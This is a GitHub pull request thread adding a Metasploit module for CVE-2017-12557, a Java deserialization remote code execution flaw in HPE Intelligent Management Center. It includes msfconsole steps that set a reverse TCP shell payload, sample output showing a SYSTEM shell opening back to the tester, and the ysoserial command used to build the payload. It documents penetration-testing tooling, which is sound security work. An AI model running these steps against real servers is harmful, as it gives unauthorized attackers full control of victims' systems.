CVE-2017-12557: HPE Intelligent Management Center Java Deserialization RCE

[carmaa]

Adds an exploit module for HPE Intelligent Management Center Java Deserialization RCE (Windows).

Test env setup

On a Windows machine, download and install HPE IMC from here:

https://h10145.www1.hpe.com/downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19066&ProductNumber=JG748AAE&lang=&cc=&prodSeriesId=&SaidNumber=

You need .Net 2.0, but that's the only dependency.

Make sure to follow any instructions on setting up SSL correctly (certain cipher suites does not play well with the software). These instructions may vary depending on the win version you set it up on. On a Windows Server 2012 R2 I had to disable certain cipher suites.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/windows/http/hp_imc_java_deserialize
• set RHOSTS
• set payload windows/shell/reverse_tcp
• set LHOST
• Receive reverse SYSTEM shell

Sample output

msf5 exploit(windows/http/hp_imc_java_deserialize) > check
[*] 192.168.1.2:8080 The target appears to be vulnerable.
msf5 exploit(windows/http/hp_imc_java_deserialize) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.2
[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:58113) at 2018-11-10 23:06:10 +0100



C:\Program Files\iMC\client\bin>

[h00die]

Please add documentation, see https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md

Also, the PR queue is rather high right now. Not sure when someone will get to this (although it may peek someone's interest), so it may be a few weeks till a final review to land will happen.

[bcoles]

Please use two spaces for indentation

[bcoles]

Thanks. The updates look good to me from a quick read through the code, although I have a few comments (see above).

Once you're happy with the module (pending #10947 (comment) and review comments), please add documentation.

• Template
• Examples

[carmaa]

Allright, documentation added in eab26a0. Thanks for all the help so far @bcoles !

[jmartin-tech]

Jenkins test this please.

[asoto-r7]

After discussing it with @jrobles-r7, I'm going to take point on this one.

[asoto-r7]

@carmaa: The module works great! I would suggest setting the WfsDelay option to at least 5 seconds to give more time for the target to respond.

Also, I see you've used ysoserial-modified to generate the jsonss Base64 variables. Could you provide me with the steps to recreate the three sections: jsonss_start, jsonss_mid, and jsonss_end?

Thanks!

[bcoles]

Looks like the sanity checks are suffering they're scheduled weekend insanity. As usual, this warning can be ignored.

[bcoles]

LGTM

[carmaa]

@asoto-r7: The process to create the payload was not straight-forward, that's why #10057 is a great idea. In the JSON1 payload specifically, there are several bytes that are dependent on the length of the command, so I had to find those bytes by trial and error. But the command that was used to create the serialised object was java -jar ysoserial-modified.jar JSON1 cmd "".

[asoto-r7]

@carmaa: Thanks for the module, and for the help. After having to retrace your steps, I can say I definitely appreciate your comment about finding the payload offsets "by trial and error". I documented my reproduction steps in the comments of the module to help the next person. :-)

[asoto-r7]

Release Notes

The HP Intelligent Management Java Deserialization RCE module has been added to the framework. This exploits a Java deserialization vulnerability in HP Enterprise Intelligent Management Center PLAT version 7.3 E0504P2, providing a command-line or Meterpreter shell on the target.